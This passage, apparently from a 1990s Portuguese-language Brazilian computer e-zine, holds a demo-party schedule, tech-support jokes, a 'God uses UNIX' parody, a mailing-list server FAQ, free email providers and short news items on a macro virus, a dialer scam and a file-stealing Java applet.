doors open 12: 13: 14: 15: 16: 17: 18: 19: 20: 21: 22: Deadline Ansi Competition 23: Deadline Music Competition 24: Concert TRAXX Live. SATURDAY 02.11.96 01: Deadline Graphic & Raytrace Graphic Competition 02: Ansi Competition Starts 03: 04: 05: 06: Graphic Competition Starts 07: Raytrace Competition Starts 08: 09: Music Competition Starts 10: 11: Deadline 4k intro 12: 13: 14: 4k intro competition starts 15: 16: Deadline 64k intro compo 17: 18: Deadline Demo Competition 19: 20: 21: 64k intro Compo Starts 22: 23: Demo Competition Starts 24: SUNDAY 03.11.96 01: 02: 03: Deadline Raytrace Movie 04: 05: 06: 07: Raytrace Movie Competition Starts 08: 09: DEADLINE FOR VOTING 10: 11: 12: 13: 14: PRIZE CEREMONY 15: 16: 17: Party Doors Close =C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4= =C4[ 11. DISCLAIMER ]=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4=C4= =C4=C4=C4=C4=C4=C4=C4 --------------------------------------------------------------------------- NEWS - PIADAS - BUGS - LINUX - DICAS - ETC.. ============================================ PIADAS e FATOS ENGRACADOS Subject: [PIADAS-L] Voce se considera ignorante em computadores?? (fwd) Entao verifique os casos ocorridos abaixo, de um artigo do Wall Street Journal por Jim Carlton: 1. A Compaq esta' pensando em mudar o comando "Press Any Key" por causa da enxurrada de consultas tecnicas perguntando sobre onde fica a tecla "Any". 2. O suporte tecnico da AST tem uma chamada de uma mulher reclamando que o mouse dela e' de dificil controle. Descobriu-se que era porque ela nao tinha retirado o plastico que o protege contra po'. 3. Um tecnico de suporte da Compaq recebeu uma chamada reclamando que o sistema nao conseguia ler os arquivos de seus diskettes mais antigos. Depois de varios testes infrutiferos nos drives, descobriu que o usuario colocava etiquetas nos diskettes e os introduzia na maquina de escrever para datilografar as etiquetas. 4. Um usuario foi solicitado a enviar uma copia de seus diskettes defeituosos. Alguns dias depois chegou uma carta do usuario com copias xerox dos diskettes. 5. Um tecnico da Dell orientou seu cliente para colocar seu diskette com problemas de volta no drive A: e fechar a porta. O cliente disse para o tecnico esperar um pouco, deitou o telefone sobre a mesa, atravessou a sala e foi fechar a porta da sala. 6. Um usuario da Dell chamou o suporte tecnico reclamando que seu computador nao conseguia enviar nenhum fax. Depois de 40 minutos tentando achar o erro, descobriu que o usuario estava tentando enviar o fax colocando a folha de papel na frente do monitor e clicando o botao "Send Fax". 7. Outro usuario da Dell reclamou que seu teclado nao mais estava funcionando. Como o teclado estivesse muito sujo, ele lavou-o na pia e deixou-o secando noite. Depois tirou todas as teclas e lavou-as com agua e sabao. 8. O suporte tecnico da Dell recebeu uma chamada de um usuario furioso porque seu computador havia-lhe chamado de "ruim e invalido". O tecnico explicou que a frase se referia a um comando e nao devia ser tomada a nivel pessoal. 9. Uma usuaria desesperada chamou a Dell porque nao conseguia ligar seu computador. Depois de se assegurar que o havia ligado na tomada, o tecnico perguntou-lhe o que acontecia quando ela apertava o botao de ligar. Ela respondeu que pisava e pisava no pedal e nada acontecia. O pedal era o mouse. 10. Uma usuaria ligou para a Compaq dizendo que seu computador novo nao funcionava. Ela disse que tirou o computador da embalagem, ligou-o na tomada, esperou 20 minutos e nada aconteceu. Quando perguntada sobre o que ocorria quando ela apertava o botao de ligar ela respondeu: "Que botao de ligar?". --------------------------------------------------------------------------- "E comovente a historia de um Sysop da Novell Netware atendendo a um telefonema - Departamento Tecnico, posso ajuda-lo? - Sim, o problema e o seguinte: o suporte de copos de meu PC quebrou. Mas ele ainda esta na garantia e gostaria de conserta-lo. - Suporte de copos? - Sim, fica bem na frente do computador. - Desculpe, mas isso nao faz parte de nossa configuracao. Onde o Sr. comprou o suporte: numa loja, numa feira? E importado? Ele tem alguma marca de fabricante? O usuario entao responde: - Nao, ele veio com a maquina. Esta escrito 4X. []'s ---------------------------------------------------------------- Fabricio A.M. Subject: [PIADAS-L] (fwd) Todos sabem (exceto os que ignoram) que temos hoje capacidade de fazer uma esfera virtual (um "planeta") de qualquer tamanho, colocar nela trilhoes de informacoes, e gerar "seres" que aprenderao a historia que acabamos de criar e acreditarao que vivem num mundo que tem milhoes de anos. E se fossemos nos, tambem, aqui na Terra, uma mera experiencia de Deus, recem-criada? Pessoalmente, acredito nesta hipotese, sobretudo depois que, atraves de minha interface informatica (o geologo Gravata), recebi este documento secreto, conhecido apenas por 80 milhoes de usuarios da internet: NO PRINCIPIO DEUS USOU O UNIX... pois no principio so havia Deus Todo-Poderoso e o sistema UNIX ("ewe-niks", na intimidade), multitask e multiusuario, tambem todo-poderoso. Aqui, unixemente, % e Deus e #, UNIX. % "Faca-se a luz!" # Entre identificacao usuario. % Deus. # Entre senha. % Onisciente. # Senha incorreta. Tente de novo. % Onipotente. # Senha incorreta. Tente de novo. % Tecnocrata. # E Deus acessou o sistema as 12:01:00, domingo, 1 de abril. Estabeleca seu credito. % US$ 100.00 # Confirmado. US$ 100.00 % Faca-se a luz! # Comando inexistente. Tente de novo. % Invente-se a luz! # Feito. % Rodar Ceu e Terra. # E Deus criou o Dia e a Noite. E Deus viu que havia 0 (zero) erros. # # E Deus saiu do sistema as 12:02:00, domingo, 1 de abril. # # # Saldo de Deus Todo-Poderoso: US$ 98.50 # # # # Deus voltou a acessar o sistema as 12:01:00 da segunda-feira, 2 de abril. % Haja firmamento no meio das aguas e da luz. # Comando irreconhec!vel. Tente de novo. % Criar firmamento. # Feito. % Rodar firmamento. # E Deus dividiu as aguas. E Deus viu que havia 0(zero) erros. # # E Deus desconectou as 12:02:00 de segunda-feira, 2 de abril. # # Saldo restante: US$ 91.40 # # # E Deus voltou ao sistema as 12:01:00, terca-feira, 3 de abril. % Faca-se com que todas as aguas sob o Firmamento se juntem e que a Terra Seca surja em meio a elas. # Excesso de caracteres - imposs!vel compactar comando. Tente de novo. % Criar Terra Seca. # Feito. % Rodar Firmamento. # Comando obedecido. Aguas divididas. E Deus viu que havia 0 (zero) erros. # # Deus desconectou as 12:02:00, terca-feira, 3 de abril. # # # Saldo: US$ 67.10 # # # # Deus reconecta as 12:01:00, terca-feira, 4 de abril. % Criar Luzes no Firmamento para dividir dia e noite. # Tipo de tecnologia nao especificado. Tente de novo. % Criar um Sol, uma Lua e 100 mil Estrelas. # Feito. # # Deus criou os Ceus. E Deus viu que havia 0 (zero) erros. # # # Deus desconectou as 12:02:00, quarta-feira, 4 de abril. # # # # Saldo: US$ 61.00 # # # # # Deus reconectou as 12:01:00 da quinta-feira, 5 de abril. % Criar peixes. # Feito % Criar aves de modo geral e Ovo de galinha em particular. Caprichar na embalagem. # Aves criadas. Imposs!vel Ovo so de galinha. Tente de novo. % Criar Ovo generico, inclusive para jacare. Caprichar na embalagem do Ovo generico # Feito. % Rodar peixes, aves, ovos. # Deus criou os Monstros marinhos e todas as criaturas vivas ate as aguas se escurecerem com rebanhos e cardumes de peixes e semelhantes e o ceus ficarem cheios com todos os animais alados. E Deus viu que havia 0 (zero) erros. # # Deus desconectou as 12:02:00 da quinta-feira, 5 de abril. # # # Saldo remanescente: US$49.74 # # # # Deus reconecta as 12:01:00, sexta-feira, 6 de abril. % Criar o gado. # Feito. % Criar as coisas rateiras, horripilantes, hediondas e nojentas. # Feito. % Fazer o homem a nossa imagem. # Caracteristicas nao especificadas. Tente de novo. % Criar o homem de qualquer maneira. # Feito. % Fazer o homem multiplicar e povoar a Terra e dominar os peixes no mar, as aves do ar, e ter ascend^Hncia sobre todas as coisas que rastejam sobre a Terra. # Excesso de comandos simultaneos. Tente novamente. % Rodar multiplicai. # Comando realizado. 7 erros. % Incluir respirar. # Feito. % Repetir multiplicar sem limite. # Execucao completa. 4 erros. % Mover homem para Jardim do eden. # Feito. % Rodar multiplicai. Sem limite. # Execucao terminada. 3 erros. % Inserir mulher no homem. # Parametros invertidos. Retifique. % Inserir homem na mulher. # Feito. % Rodar multiplicai.Sem limite. # Operacao executada. 345 erros. % Criar desejo. # Feito. % Rodar multiplicai. Sem limite. # E Deus viu o homem e a mulher sendo frutiferos e multiplicando no Jardim do eden. 666 erros. * Atencao: Rodar sem limite de tempo. 4212 erros. % Criar livre arbitrio. # Feito. % Rodar livre arbitrio. # Feito. % Eliminar desejo. # Desejo nao pode ser eliminado devido a criacao do livre arbitrio. % Destruir livre arb!trio. # Livre arbitrio e arquivo inacessivel e nao pode ser destruido. * Acione tecla de substituicao, cancelamento ou help. % Criar arvore da ciencia do conhecimento. # E Deus viu o homem e a mulher sendo frutiferos e multiplicando no Jardim do eden, ja nao respeitando parametros estabelecidos. % Criar o bem e o mal. # Feito. % Ativar mal. # E Deus viu que tinha criado a vergonha. * Atencao: Erro do sistema na ultima operacao E96. Homem e mulher nao estao em Jardim do eden. 4277732 erros. % Scannear Jardim, E.D.E.N. homem-mulher. # Busca negativa. % Apagar vergonha. # Vergonha nao pode ser apagada com mal ativado. % Destruir livre arb!trio. # Arquivo incessivel. Nao pode ser destruido. * Acione tecla de substituicao, cancelamento ou help. % Interromper programa! # Exclamacao imperativa torna comando irreconhec!vel. Tente interrogacao ou Help. % Suspender programa. % Suspender programa. % Suspender programa, porra! # Atencao todos usuarios. Atencao todos usuarios. Sistema desligado para manutencao rotineira. Por favor, desliguem. % Criar novo mundo. # O usuario ultrapassou o espaco-tempo estatico-dinamico do arquivo criacao. Eliminar arquivos anteriores para que novos arquivos possam ser alocados. % Destruir Terra. # Destruir Terra, confirmar. % Destruir Terra, confirmado. # Terra destruida. Confirmado. Desligando sistema. Dez segundos para sistema fora do ar . Saldo final: US$ 0.00 []'s ---------------------------------------------------------------- Fabricio A.M. Prezado L. A. Mo. ************************************************* O Info-rama WIRED ------------------ O texto COMPLETO (menos propaganda) de todas os numeros anteriores da revista wired (e texto adicional que nao foi incluido na revista) esta' disponivel via email. Mande e-mail para: info-rama@wired.com sem subject e com as palavras: get help No corpo da mensagem. Vao enviar uma mensagem explicando como usar o Info-rama (nome do servico) para pedir arquivos da revista WIRED. Exemplo: Para pegar o arquivo de help e o arquivo de indice principal coloque: get help get faq get master.index end O "end" em seguida e' para evitar que a signature acione ou devolva mensagem de erro. A sintaxe e' sempre: get <arquivo> end Sempre usando o info-rama@wired.com. Uma dica pra pegar a lista de todos os arquivos anteriores e' usar o comando get back.back.issues end Faz um tempo que nao uso isso, entao pode haver um erro nesse ultimo arquivo. De resto, se virem. (texto mais ou menos copiado do help do info-rama e traduzido por Derneval). &&&&&&&&&&&&&&&&&&&&&&&&&&&&&& ESQUINA DAS LISTAS - PERGUNTAS MAIS FREQUENTES Subject: Listas `a torto e `a direito ################################################# # # # Introdu,c~ao `a Esquina das Listas # # ---------------------------------- # # (atrav'es de exemplos) # # # # Esquina-das-Listas@dcc.unicamp.br # # # ################################################# Autor: Marcos J. C. Euz'ebio -------- | 1) Que esquina 'e esta? -------- J'a foi mais f'acil explicar o que 'e a esquina-das-listas. Ou talvez, eu a conhecia menos. Quer dizer no in'icio havia um servidor de listas "tropicalizado", algumas listas e alguns usu'arios. Hoje o servidor de listas 'e apenas uma parte, cada vez menor, da esquina-das-listas. O n'umero de listas aumentou e o n'umero de usu'arios tamb'em. Ou seja, a esquina-das-listas tem muitas facetas. A principal delas 'e formada pelas m'ultiplas comunidades, que reunidas em torno de um tema, utilizam a face operacional da esquina para trocar id'eias. Estas id'eias s~ao difundidas de v'arias maneiras. Por correio-eletr^onico e pelo WWW, atualmente. No futuro pretende-se fazer a distribui,c~ao na Usenet e por ftp tamb'em. -------- | A quem se destina? -------- A Esquina da Listas est'a aberta a todos que tem acesso `a internet. A distribui,c~ao autom'atica de mensagens, por correio eletr^onico, a assinantes est'a restrita aos provedores dispostos a colaborar com a tarefa. Detalhes do funcionamento da esquina-das-listas podem ser obtidos em outro documento. Escreva para esquina-das-listas@dcc.unicamp.br e coloque, no in'cio da mensagem, ciranda para receb^e-lo. O acesso ao reposit'orio de mensagens da esquina n~ao est'a sujeito a nenhuma restri,c~ao. A vers~ao www do reposit'orio encontra-se na url: http://www.dcc.unicamp.br/esquina-das-listas/esquina.html As mensagens tamb'em podem ser solicitadas, uma-a-uma, do reposit'orio, por correio eletr^onico. Vide os comandos indice e envie abaixo. -------- | Quais os endere,cos da esquina? -------- S~ao os seguintes: mailto:esquina-das-listas@dcc.unicamp.br http://www.dcc.unicamp.br/esquina-das-listas/esquina.html news: (em implanta,c~ao) ftp: (em implanta,c~ao) -------- | Como participar da esquina? -------- A participa,c~ao, ativa, na esquina 'e intermediada pelo servidor da esquina. Ou seja, toda contribui,c~ao ou pedido administrativa deve ser enviada, por correio eletr^onico, ao servidor da esquina (esquina-das-listas@dcc.unicamp.br). Os pedidos podem conter um ou mais comandos. Comandos devem come,car no in'icio da linha e 'e permitido apenas um comando por linha. Se o comando for muito longo e n~ao cabe em uma s'o linha pode-se continuar na linha seguinte, deixando um ou mais espa,cos em branco no in'icio da continua,c~ao. -------- | Como parar de receber uma lista? -------- Para interrromper a vinda de mensagens de uma lista, mpb, p. ex., envie o comando: cancele mpb Voc^e deve adicionar o endere,co de assinatura, quando ele for diferente do endere,co de envio da mensagem. Se voc^e n~ao sabe sob qual o endere,co est'a a assinatura utilize o comando usuarios, que permite fazer pesquisas sobre a rela,c~ao de usu'arios da esquina. Por exemplo: usuarios futebol jose vai devolver a rela,c~ao dos assinantes da lista futebol que jose no seu endere,co. -------- | Como se inscrever em uma lista? -------- Para assinar a lista formula-1, por exemplo, seu pedido deve conter um comando assim: inscreva formula-1 Inclua o endere,co eletr^onico de assinatura se ele 'e diferente do que aparece na sua mensagem. A inscri,c~ao em uma lista n~ao garante a recep,c~ao autom'atica de todas as mensagens submetidas `a mesma. Primeiro porque a distribui,c~ao s'o feita aos provedores cadastrados e aderentes ao esquema de distribui,c~ao da esquina. Em segundo lugar as condi,c~oes de tr'afego na internet podem dificultar ou at'e impedir a entrega de mensagens. -------- | E para submeter uma contribui,c~ao? -------- Para enviar um artigo para a lista futebol inclua o comando submeta futebol na primeira linha do seu artigo. Evite excesso de cita,c~oes (linhas obtidas em outras mensagens e que comecem com o caracter ">"). Mensagens muito longas poder~ao n~ao ser distribu'idas para todos os usu'arios. O sistema de distribui,c~ao imp~oe um limite de tempo para o envio de uma mensagem. Se o limite 'e ultrapassado a mensagem n~ao 'e enviada. Embora o t'opico esteja fora do escopo deste guia, 'e sempre bom lembrar que a observ^ancia de normas m'inimas de educa,c~ao e bom senso s~ao ainda mais importantes no meio eletr^onico. Ao respeit'a-las voc^e estar'a dando um bom exemplo, contribuindo para a para a melhoria da qualidade da intera,c~ao e conviv^encia entre os participantes da esquina e minimizando dores de cabe,ca para voc^e mesmo. Dois conselhos que fazem parte do folclore da net s~ao: n~ao irrite e n~ao se irrite! A esquina permite a realiza,c~ao de "cross-postings": submiss~ao simult^anea de uma mensagem para v'arias listas (da esquina). O abuso desta facilidade irrita muita gente. -------- | Quais as listas dispon'iveis? -------- A rela,c~ao completa das listas dispon'iveis pode ser obtida atrav'es do comando: listas -------- | Como solicitar mensagens do reposit'orio da esquina? -------- As mensagens submetidas `a esquina ficam armazenadas em um reposit'orio por um tempo limitado (sete dias, atualmente). C'opias destas mensagens podem ser solicitadas por correio eletr^onico. Dois comandos s~ao necess'arios para a utiliza,c~ao deste servi,co. O comando indice religiao retorna uma rela,c~ao das mensagens, submetidas `a lista religi~ao, p.ex., e que est~ao dispon'iveis no reposit'orio. Na rela,c~ao aparece a identifica,c~ao associada a cada mensagem e que deve ser usada para solicit'a-la. Para solicitar de uma determinada mensagem 'e necess'ario saber a identifica,c~ao da mesma. Depois 'e s'o enviar o comando envie religiao/1-1 para a esquina para receber a c'opia da mesma. Este servi,co est'a aberto a todos os usu'arios, indepente da posi,c~ao do provedor com rela,c~ao `a esquina. -------- | Como obter informa,c~oes sobre os usu'arios da esquina? -------- O cadastro dos usu'arios da esquina pode ser pesquisado com a utiliza,c~ao do comando usuarios. Este comando permite a realiza,c~ao de buscas variadas. Por exemplo: usuarios mpb Fornece a rela,c~ao dos participantes da lista mpb, neste caso. usuarios iacec.unicomp.br Devolve a rela,c~ao das assinaturas provenientes do Inst. de Artes, Ci^encias e Engenharias de Computa,c~ao da Universidade de Compinas. usuarios iacec.unicomp.br mpb Restringe `a assinaturas da lista mpb usuarios mpb jose Restringe a busca aos assinantes da da lista mpb em que aparece a palavra jose. usuarios jose Restringe a busca aos assinantes em que aparece a palavra jose -------- | Outros comandos? -------- Sim, dois: info Para receber a vers~ao corrente desta mensagem. (10.mar.1997) fim Indica que n~ao tem mais comandos na mensagem. Funciona como a barreira para impedir que o servidor da esquina invente de tentar interpretar assinaturas, p. ex., como comandos. -------------- | Reclama,c~oes -------------- A esquina n~ao disp~oe de um servi,co de atendimento ao usu'ario. Reclama,c~oes, d'uvida, pedidos de aux'ilio devem ser submetidos `a lista esquina. Se voc^e assina a lista esquina sinta-se a vontade para responder as d'uvidas dos seus colegas. Se poss'ivel envie a resposta tamb'em para a lista esquina, com isto outros tamb'em se beneficiar~ao. Outra forma de colaborar 'e na elabora,c~ao de faq's (Quest~oes frequentes e respostas). Elas auxiliam aos novos assinantes entrar no contexto da lista, al'em de evitar a repeti,c~ao de perguntas frequentes. Se voc^e sente-se preparado para preparar uma faq para alguma lista v'a em frente. A faq deve ser enviada periodicamente `a lista. -------- | E para criar uma lista? -------- O processo de cria,c~ao de uma lista no servidor da esquina das listas 'e um tanto trabalhoso e exige uma certa bagagem na utiliza,c~ao de correio eletr^onico, de modo geral, e da esquina-das-listas, em particular. Se voc^e est'a disposto a criar uma lista 'e recomendado, antes de mais nada, que se inscreva na lista esquina. Nesta lista s~ao tratados de assuntos ligados `a administra,c~ao e utiliza,c~ao da esquina-das-listas. C'opias de mensagens relacionadas ao processo de cria,c~ao de uma lista devem ser enviadas para l'a. O processo de cria,c~ao de uma lista na esquina-das-listas 'e p'ublico e a participa,c~ao 'e aberta a todos integrantes da internet. Para que sua lista seja criada 'e importante que voc^e entenda os passos a serem listados a seguir e os siga. Caso contr'ario sua lista _n~ao_ ser'a criada. 0- Consulta e Discuss~ao --------------------- Nesta fase, informal, o proponente da lista deve conversar com seus colegas e participantes de listas voltadas para assuntos parecidos com o da lista que ele pretende criar. Porque destas conversas? Pelos motivos abaixo: . escutar a opini~ao de terceiros sobre a exist^encia da necessidade da lista; . verificar se j'a n~ao existe alguma outra lista de mesmo tema que a lista proposta; . sondar a rea,c~ao e o impacto que a lista vai causar nas outras pessoas. Quanto tempo deve durar esta fase? O tempo que o proponente considerar oportuno. Ou seja, quando ele para quando j'a tiver recolhido subs'idios suficientes para decidir com seguran,ca sobre a continua,c~ao ou n~ao do processo de cria,c~ao da lista. Se a resposta foi positiva e o proponente acredita que a lista ser'a bem recebida ele pode passar, com tranquilidade, para o passo seguinte. 1- Vota,c~ao --------- O objetivo desta fase 'e confirmar a aprova,c~ao da lista pelos usu'arios da internet. Estas fase 'e mais formal e est'a sujeita a algumas regras importantes. O in'icio desta fase 'e indicado pelo envio de uma mensagem que vai registrar o pedido de cria,c~ao da lista. Esta mensagem dever'a ser distribu'ida na lista esquina. A mensagem deve ser enviada `a esquina-das-listas@dcc.unicamp.br e dever'a conter o comando: submeta esquina Abaixo deste comando a mensagem dever'a conter a ficha de cria,c~ao da lista, contendo v'arias informa,c~oes: . nome da lista proposta. . escopo da lista: descri,c~ao dos objetivos da lista, p'ublico alvo e outras informa,c~oes que o proponente considerar pertinentes. . orienta,c~ao aos votantes: - prazo de vota,c~ao: data final da vota,c~ao (prazo m'inimo de duas semanas); - endere,co de vota,c~ao: endere,co para o envio de votos. (Os votantes devem ser instru'idos a n~ao mandarem seus votos para listas, apenas para o(s) endere,co(s) indicados.) - formato do voto SIM: que mensagem deve ser enviada para o endere,co de vota,c~ao para indicar a _aprova,c~ao_ da lista proposta. - formato do voto NAO: que mensagem deve ser enviada para o endere,co de vota,c~ao para indicar a _desaprova,c~ao_ da lista proposta. IMPORTANTE: A organiza,c~ao e condu,c~ao da vota,c~ao 'e tarefa de responsabilidade do proponente da lista. 2- Divulga,c~ao dos Resultados e Averigua,c~ao ------------------------------------------- O resultado final da vota,c~ao dever'a ser divulgado pelo proponente da lista tamb'em na lista esquina. Isto 'e feito atrav'es do envio de uma mensagem para: esquina-das-listas@dcc.unicamp.br e conter'a o comando: submeta esquina Abaixo deste comando dever'a vir a lista completa dos endere,cos dos votantes e uma indica,c~ao clara de suas op,c~oes: a favor ou contra a aprova,c~ao da lista proposta. Ser'a dado um prazo de uma semana para que os resultados possam ser verificados pelos votantes e demais usu'arios da esquina. Qualquer suspeita de fraude tornar'a nulo todo o processo; abortando a cria,c~ao da lista. Se a lista receber um n'umero de aprova,c~oes razo'avel e o a rea,c~ao negativa a cria,c~ao da mesma n~ao for muito grande, a lista ser'a criada pelo administrador da esquina-das-listas. Listas Inativas -------------- As listas que que n~ao tiverem nenhuma movimento no per'iodo m'inimo de tr^es meses poder~ao ser descontinuadas. (mjce/1997.abril.19)\ ----------------------------------------------- FREE E-MAIL =========== 1. NetForward http://www.netforward.com 2. HoTMaiL http://www.hotmail.com 3. Trale http://www.trale.com 4. WWDG Free Email http://www.wwdg.com/email/ 5. MailMasher http://www.mailmasher.com 6. StarMail - Over 100 domains to choose from!! http://www.starmail.com 7. iName - Over 100 domains to choose from!! http://www.iname.com 8. Geocities http://www.geocities.com 9. Juno http://www.juno.com 10. Net@ddress http://netaddress.usa.net 11. Bigfoot http://www.bigfoot.com 12. MailHost http://www.mailhost.net 13. POBox http://pobox.com/pobox/ 14. POBoxes http://www.poboxes.com 15. PEmail http://www.pemail.net 16. La Jolla Shores http://www.lajollashores.com 17. From.Net http://from.net 18. iName http://www.unforgettable.com 19. Four11 http://www.four11.com Lenimar N. A.(retirado do jampa@lists.americasnet.com) %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% BUGS E ETC.. E D U P A G E 21 de janeiro de 1997 | Portugues FALHAS DE SEGURANCA NA REDE Dan Farmer, autor do software SATAN que foi projetado para entrar as falhas nos sistemas de seguranca dos sitios na Web, acaba de realizar uma pesquisa nao cientifica em aproximadamente 2.200 sitios na Web e encontraram de 70 a 80% "falhas serias de seguranca". A pesquisa foi feita entre 1.700 sitios "de maior popularidade" e outros 500 selecionados de forma aleatoria. Nos sitios de maior popularidade encontrou-se o dobro do percentual em problemas de seguranca do que aquele encontrado na amostra selecionada aleatoriamente. "Muitos dos sitios realmente interessantes estao fazendo malabarismos", explicou Farmer. "Estao oferecendo uma gama de servicos - correio eletronico, noticias sobre a Internet, contas de usuario e outros do genero. Tais servicos nao sao dificeis de manter no ar. Mas comece a colocar "bolinhas" la' e perde-se o controle ... Simplesmente e' dificil manejar tudo isso durante muito tempo. E, de tempos em tempos, reclama-se dos empregados responsaveis por manter tudo em funcionamento - nao necessariamente com seguranca. Os administradores de sistemas quase nunca obtem o orcamento e treinamento adequados para implanta-los com seguranca e de forma apropriada". Dos 660 bancos revisados, uns 68% contam com sitio que Farmer considera altamente vulneravel. Investor's Business Daily 20 jan 97 A6 ----------------------------------------- Nao sei de onde recebi isto: Foi reportado hoje um novo golpe perpetrado via internet! Funciona da seguinte maneira: Voce vai a um homepage onde te avisaram (via e-mail ou qq outra maneira) que tem imagens pornograficas, ou mulheres ao vivo, ou alguma coisa de esportes, etc., qq que eles tenham visto que seja de seu interesse ou que lhe aguce a curiosidade. Nesta homepage, eles lhes pedem que baixem e instalem um software gratuito, para lhe permitir ver as imagens ou filmes, etc., alegando que os mesmos tem formato proprietario ou algo assim. Ai e' que entra o golpe. Na hora em que voce usa o tal software, ele faz uma conexao via uma ligacao telefonica de larga distancia, para fora dos EUA, atraves de uma companhia que vai cobrar entre 1 a 2 dolares por minuto! E pior, mesmo quando voce para de usar o tal leitor de imagens ou mesmo o seu browser, a conexao continua ativa, so' se desligando quando voce desligar o computador!!! Se voce foi a alguma homepage assim, apague imediatamente o tal leitor. Inumeras pessoas cairam neste golpe e se viram com contas absurdas no final do mes!!! Avise a todos os internautas que voce conhecer. -- noticia vinculada pelo Universo OnLine: >Novo virus de macro ataca MS Mail >da Universo Online > >A empresa de antivirus McAffee localizou um novo virus de marco que >manda mensagens ao acaso de pessoas que usam o Microsoft MS Mail. > >"ShareFun" e' o nome do virus, que e' simples de detectar e prevenir. >Como todos os virus transmissmveis por correio eletronico, ele e' >mandado num "attachment". Para "pegar" o virus, o usuario precisa >executa-lo - geralmente com um clique duplo sobre o "attachment". > >Usuarios experientes evitam abrir "attachments" de que n{o sabem a >origem. Segundo a McAffee, este i o grande problema do "ShareFun". >Ele pode ser enviado por um amigo. > >A McAffee descobriu a existjncia do vmrus atravis de um cliente. Uma >grande corpora|{o suspeitou que seu sistema estava infectado. Um >funcionario da McAffee explicou que geralmente a mensagem vem com >o assunto "You have to see this"! Quando a mensagem i aberta, esta >em branco. Se o usuario clicar no "attachment", quando o Word o abre, >o vmrus i iniciado. > >O vmrus tem uma chance em quatro de voltar para o MS Mail e mandar >automaticamente mensagens com "attachments" dele mesmo para trjs >pessoas na lista de endere|os do programa. > >A cada vez que o Word i aberto, o vmrus fica ativo de novo e tem uma >chance de 25% de ser mandado atravis do sistema de mail. > >O problema deste vmrus i que, a cada vez que ele manda uma mensagem, >ele envia o documento em que a pessoa estiver trabalhando no momento. >Se ela estiver trabalhando num texto confidencial, por exemplo, ele >sera enviado a trjs pessoas, ao acaso. > >Segundo a Microsoft, o MS Mail esta sendo descontinuado e substitumdo >pelo Exchange. O Word 97 tem uma fun|{o que detecata qualquer macro - >seja ou n{o um vmrus. Quem n{o tiver o Word 97 podem copiar a fun|{o >no site da Microsoft. Fonte ==> http://www.uol.com.br/internet/flashvox/fla2102.htm Ja' andei conferindo no site da McAfee e la' eles confirmam o virus, inclusive explicando como e' feito a infeccao e a sua propagacao. Maiores detalhes podem ser obtidos em: http://www.mcafee.com/support/techdocs/vinfo/v3333. html Uma analise bem interessante de como as mensagens que foram repassadas pela imprensa sobre o virus pode ser vista no seguinte site: http://www.kumite.com/myths/myths/myth029.htm Maiores informacoes sobre virus de macro e como se previnir dele podem ser obtidas em: http://www.microsoft.com/kb/articles/q138/8/68.htm Cabe ressaltar que este virus nao vai infectar o computador pelo simples fato de ser recebido pelo email, mas sim se rodado, como pode acontecer com qualquer executavel anexado a um email... Cabe ai' a quem receber o email ser cuidadoso, fazendo com que o arquivo recebido seja "passado" por um anti-virus. Outra recomenda|{o e' designar que arquivos .DOC nao sejam abertos automaticamente pelo MS-Word, mas sim pelo WordView, que pode ser conseguido no site da Microsoft: http://www.microsoft.com/word/internet/viewer/viewer9 5/default.htm Como no WordView nao sao executados macros, alem de que nao ha' como salvar arquivos, ele se torna uma ferramenta bastante util para visualizar arquivos sem correr o risco de ver o seu Word ser infectado por um virus de macro. []'s http://www.tca.com.br/usrf/charles/ ------------------------------------------------------- APPLETS JAVA PODEM ATACAR SUA REDE Paul Merenbloom, para o InfoWorld De vez em quando, os privilegios de ser colunista do InfoWorld sao um tiro pela culatra. Alguem leu minha coluna e me enviou alguns aplicativos Java muito interessantes projetados para gerenciar e controlar roteadores de maneira segura. Baixei-os recentemente e logo reparei que meu disco rigido comecou a fazer extravagancias. De repente, passou a funcionar como se estivesse sem espaco. Pensei que talvez fosse um problema de caching do Windows 95, por isso desliguei a maquina, dei novo boot no modo MS-DOS e fui direto para o diretorio WINDOWS\TEMP. Havia muitos arquivos TMP esquecidos la. Com um simples DEL *.* resolvi o problema e retornei ao trabalho. Mas meus problemas nao pararam ai. Meu browser estava rodando o codigo Java de novo - desta vez, sem qualquer outro aplicativo na memoria - quando o disco rigido ficou enlouquecido. Droga! Eu tinha uma conexao dial-up aberta porque o codigo que estava executando veio de uma fonte baseada na Web. Bingo! Uma olhada rapida nas luzes do modem mostrou a luz de dados enviados brilhando intensamente! A luz apagou e um e o computador iniciou uma rotina de captura. Parece que alguem estava usando o codigo Java para descarregar meu registro e selecionar arquivos, sobretudo os terminados em .XLS - dados de planilha. Isto explicou o funcionamento constante do disco rigido. O codigo estava buscando meus arquivos! Felizmente, os unicos arquivos .XLS neste PC sao os demos que vem com o CD Office Professional da Microsoft. Mas se houvesse dados importantes eu estaria em apuros. Evidentemente, a pessoa que estava me mostrando o novo software de gerenciamento nao tinha a menor ideia de que alguem havia inserido codigo trapaceiro no aplicativo Java. O interessante e que o applet usou meu codigo de e-mail para redirecionar os arquivos secretamente - sem duvida, um bom exemplo de crianca travessa brincando fora do quadrado de areia Java. Minha experiencia ilustra um aspecto importante em termos de browsers e Java. Primeiro, as variedades espantosas de codigo Java existentes, cada um com um "sabor" diferente de implementacao Java, vao dificultar muito a integracao com sistemas de seguranca padroes. Segundo, a Java e muito interessante e oferece grande potencial, mas um applet tambem pode estar ocultando o proximo cavalo de Troia a entrar em sua rede. Contei esta historia a um amigo e ele sugeriu que eu desse uma olhada em um site chamado Finjan (http://www.finjan.com). O site Web Finjan tem um sistema de verificacao de seguranca Java que parece muito solido. Se voce apontar seu browser Web para la, descobrira quanta informacao um invasor pode obter empregando uma simples query. Mais importante, o Finjan oferece um diagnostico de seguranca que examina seu browser e alerta-o sobre do status da implementacao de seguranca. Tambem faz recomendacoes sobre o que esta em risco e como voce pode fechar qualquer gap. O codigo custa US$ 49 por copia e pode ser baixado do site. Voce tambem pode enviar o numero do seu cartao de credito ao Finjan. Isso e ironia demais para mim. Este incidente prova que existem muitas maneiras de alguem extrair dados de seu PC ou sua LAN sem seu conhecimento ou sua permissao. Ainda sou um grande fa da Java, mas agora estou mais prudente. E provavel que algum dia alguem desafie sua rede com estes tipos de ferramentas Java. Quanto a mim, estou enviando ao Finjan meus US$ 49 pelo correio e pode ter certeza 